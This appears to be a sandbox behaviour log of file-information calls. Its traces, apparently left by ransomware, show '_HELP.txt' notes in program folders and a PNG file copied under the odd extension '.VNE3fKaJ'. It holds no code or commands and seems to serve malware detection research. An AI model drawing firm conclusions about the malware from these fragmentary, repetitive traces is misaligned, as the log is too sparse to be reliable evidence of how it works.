Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	19	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	15	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	13	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	12	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	5	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\_HELP.txt	type = file_type	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\_HELP.txt	type = file_type	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	7	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	7	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	6	Fn
Get Info	-	type = size	5	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	7	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	7	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	6	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	4	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	6	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	3	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	2	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	-	type = size	1	Fn
